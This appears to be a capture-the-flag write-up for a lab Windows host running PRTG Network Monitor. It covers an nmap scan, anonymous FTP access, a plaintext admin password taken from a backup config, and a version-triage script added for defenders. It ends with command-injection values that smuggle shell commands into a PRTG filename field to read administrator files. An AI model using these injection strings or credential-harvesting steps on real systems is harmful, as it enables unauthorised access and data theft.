Start with an nmap scan:
root@kali:~# nmap -sV -sT -sC -T5 10.10.10.152
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-22 20:46 EDT
Warning: 10.10.10.152 giving up on port because retransmission cap hit (2).
Stats: 0:01:07 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.98% done; ETC: 20:47 (0:00:00 remaining)
Nmap scan report for 10.10.10.152
Host is up (0.22s latency).
Not shown: 887 closed ports, 108 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_02-25-19 11:49PM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-04-22 20:47:28
|_ start_date: 2019-04-22 20:31:55
Port 21 allows anonymous access, and the user flag is readable straight from the FTP share:
ftp://10.10.10.152/Users/Public/user.txt
Port 80 runs the PRTG Network Monitor service (version 18.1.37.13946 according to the Server header).
A script named restart.bat is found under c:\Windows\:
net stop PRTGCoreService
copy "c:\Windows\PRTG Configuration.dat" "C:\ProgramData\Paessler\PRTG Network Monitor"
net start PRTGCoreService
Following that lead, the backup file PRTG Configuration.old.bak is found in the C:\ProgramData\Paessler\PRTG Network Monitor directory, and it contains a plaintext username and password. Logging in with that password fails, but PrTg@dmin2019 logs in successfully.
A quick Google search turns up the relevant vulnerability: PRTG < 18.2.39 Command Injection Vulnerability.
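As an added defender-side example (not part of the original write-up), here is a small Python check that parses the PRTG Server banner the scan reported and compares it against the 18.2.39 fix version cited above, so an inventory of banners can be triaged into vulnerable, patched and unknown. The fix version is taken from the page, and the sample headers and host names are constructed.

```python
import re
from typing import Dict, Optional, Tuple

# Fix version cited in the write-up ("PRTG < 18.2.39"); taken from the page.
FIXED_VERSION: Tuple[int, ...] = (18, 2, 39)

# Constructed sample of the banner nmap reported for this host.
SAMPLE_HEADER = "Server: PRTG/18.1.37.13946"

_BANNER = re.compile(r"PRTG/(\d+(?:\.\d+)*)", re.IGNORECASE)


def parse_prtg_version(server_header: str) -> Optional[Tuple[int, ...]]:
    """Return the numeric PRTG version from a Server header, e.g. (18, 1, 37, 13946).

    Returns None when the header does not look like a PRTG banner at all.
    """
    match = _BANNER.search(server_header or "")
    if not match:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def is_below_fix(server_header: str,
                 fixed: Tuple[int, ...] = FIXED_VERSION) -> Optional[bool]:
    """True if the banner is older than the fixed release, False if not.

    Only as many components as the fix version has are compared, so a build
    suffix such as 18.2.39.1661 counts as patched. A banner with fewer
    components than the fix version compares as older (conservative).
    Returns None when no version could be parsed, so an unknown banner is
    never silently reported as safe.
    """
    version = parse_prtg_version(server_header)
    if version is None:
        return None
    return version[:len(fixed)] < fixed


def triage(banners: Dict[str, str]) -> Dict[str, str]:
    """Map host -> 'vulnerable' | 'patched' | 'unknown' for a set of Server headers."""
    labels = {True: "vulnerable", False: "patched", None: "unknown"}
    return {host: labels[is_below_fix(header)] for host, header in banners.items()}


if __name__ == "__main__":
    # Constructed inventory: the scanned host plus two hypothetical peers.
    inventory = {"10.10.10.152": SAMPLE_HEADER,
                 "monitor-a.example": "Server: PRTG/18.2.39.1661",
                 "web-b.example": "Server: Apache/2.4"}
    print(triage(inventory))
```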
First, dump the directory structure:
test.txt;tree /f c:\Users\Administrator > c:\output.txt
Set the time to 6 s so that it fires quickly.
The file is exported successfully.
Next, read root.txt with the same procedure:
test.txt;more c:\Users\Administrator\Desktop\root.txt > c:\output1.txt